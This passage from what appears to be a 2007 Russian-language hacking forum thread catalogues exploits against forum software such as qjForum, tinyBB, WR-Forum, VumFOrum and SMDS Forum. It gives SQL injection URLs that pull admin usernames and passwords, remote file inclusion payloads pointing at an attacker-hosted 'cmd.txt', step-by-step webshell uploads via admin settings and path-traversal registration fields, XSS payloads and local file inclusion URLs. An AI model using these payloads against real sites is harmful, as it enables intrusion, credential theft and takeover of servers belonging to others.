    1,1,1,1,1,1,1,1,1,1,1,1,1,1,null%20from%20adminLogins where approve=1 and '1'='1'
    Эксплоит : site.com/zix/main.asp?layid=-1%20union%20select% 201,null,null,null,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,nu
    ll,1,1,1,1,1,1,1,1,1,1,1,1,1,null,null%20from%20adminLogins where approve=1 and '1'='1'

    qjForum

    Описание:Недостаточная обработка поля "uName" в скрипте 'member.php'
    Для выполнения эксплоита надо залогиниться на форум
    Эксплоит : http://target/[path]/member.asp?uName='union%20select%200,0,0,username,0,0,pd,email,0,0,0,0,0,0,0,0,0,0,0,0%20from%20member

    tinyBB <= 0.3
    Описание:Ошибка в скрипте 'footers.php',позволяющая залить шелл
    Эксплоит : http://[victim]/[tBBPath]/footers.php?tinybb_footers=http://yourhost.com/cmd.txt?

    FunkBoard

    Описание:Уязвимость в скрипте profile.php позволяет сменить пасс выбранного юзера
    Эксплоит : http://milw0rm.com/exploits/1875

    QBoard <= v.1.1
    Описание:Ошибка в скрипте 'post.php',позволяющая залить шелл
    Эксплоит : http://www.site.com/[QBoard_path]/board/post.php?qb_path=[evil_scripts]

    FlashBB <= 1.1.5
    Описание:Ошибка в скрипте 'getmsg.php',позволяющая залить шелл
    Эксплоит : http://milw0rm.com/exploits/1921

    LiteForum 2.1.1
    Описание:Эксплоит-переборщик хеша пароля
    Эксплоит : http://rst.void.ru/download/r57lite211.txt

    Forum Russian Board 4.2
    Описание:Выполнение произвольных команд через уязвимый скрипт 'admin/style_edit.php'
    Эксплоит : http://rst.void.ru/download/r57frb.txt

    OpenBB 1.0.5
    Описание:SQL-иньекция через нефильтруемый параметр CID
    Эксплоит : http://rst.void.ru/download/r57openbb.txt

    Gravity Board X v1.1
    Описание:Выполнение произвольных команд через уязвимый скрипт 'editcss.php'
    Эксплоит : http://rst.void.ru/download/r57gravity.txt

    Zorum forum
    Описание:выполнение SQL-иньекции через нефильтруемый параметр 'rollid'
    Эксплоит : http://rst.void.ru/download/r57zor.txt
     
    #17 V.I.P, 29 May 2007
    Last edited by a moderator: 29 May 2007
    1 person likes this.
  18. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Форум: WR-Форум
    Версия: 1.8

    ------------------------------------------------------------

    Про уязвимости форума читать тут:

    http://forum.antichat.ru/showpost.php?p=339251&postcount=4 - (активные XSS)

    ------------------------------------------------------------

    Заливка шелла (через админку):

    Заходим в админку -> Настройки, в поле Описание (или в поле Е-майл администратора) вписываем код шелла следующим образом:

    ";?> <? Код шелла ?> <? //

    к примеру сделам вывод строки 123123:

    ";?> <? echo(123123); ?> <? //

    Шелл будет доступен по адресу:

    http://site.ru/forum/config.php

    При внедрение кода работа форума нарушена не будет.
     
    #18 Grey, 5 Jun 2007
    Last edited: 5 Jun 2007
    1 person likes this.
  19. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Форум: VumFOrum
    Версия: v2.5

    Пасcивная XSS:

    Code:
    http://site.ru/?forum=profile&user=<script>alert();</script>
    Активная XSS:

    1) В поле Сообщение вводим скрипт, скрипт будет выполняться при просмотре темы.

    2) При регистрации пользователя в поле Url вводим текст скрипта, скрипт будет выполняться при просмотре профиля пользователя.

    Заливка шелла:

    Способ 1:

    При создание темы/сообщения прикрепляем файл - шелл.

    Шелл будет доступен по адресу:

    http://site.ru/upload/shell.php

    Способ 2:

    При регистрации на форуме, в поле Имя введите ../shell.php, в поле пароль и его подтверждение введите 1, в поле Mail 1@1, в поле Url введите код шелла (к примеру <? echo(1); ?>).

    Шелл будет доступен по адресу:

    http://site.ru/shell.php

    Если прав на заливку шелла в эту директорию не хватит, то можно попробывать залить шелл в директорию upload:

    При регистрации на форуме, в поле Имя введите ../upload/shell.php, в поле пароль и его подтверждение введите 1, в поле Mail 1@1, в поле Url введите код шелла (к примеру <? echo(1); ?>).

    Шелл будет доступен по адресу:

    http://site.ru/upload/shell.php
     
    #19 Grey, 12 Jun 2007
    Last edited: 12 Jun 2007
    2 people like this.
  20. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Форум: SMDS Forum
    Версия: v.2.1 rus

    Локальный инклуд:

    Code:
    http://site.ru/Files/all_forums.php?file_read_forums=[file]
    Code:
    http://site.ru/Files/write_log.php?file_read_logs=[file]
    Code:
    http://site.ru/Files/statistic.php?file_read_statistic=[file]
    Code:
    http://site.ru/Files/downloads.php?file_read_downl=[file]
    http://site.ru/Files/downloads.php?file_add_downloads=[file]
    Пассивные XSS:

    Code:
    http://site.ru/Files/buttons.php?forum_ext=1&language[but_index]=<script>alert();</script>
    Code:
    http://site.ru/Files/downloads.php?td_all=<script>alert();</script>
    Code:
    http://site.ru/Files/downloads.php?table_all=<script>alert();</script>
    Code:
    http://site.ru/Files/faq.php?vars[your_email]=<script>alert();</script>
    Заливка шелла:

    В админке, добавляем к разрешённым расширениям файлов php, закачиваем шелл, шелл будет доступен по адресу:

    http://site.ru/Downloads/shell.php
     
    3 people like this.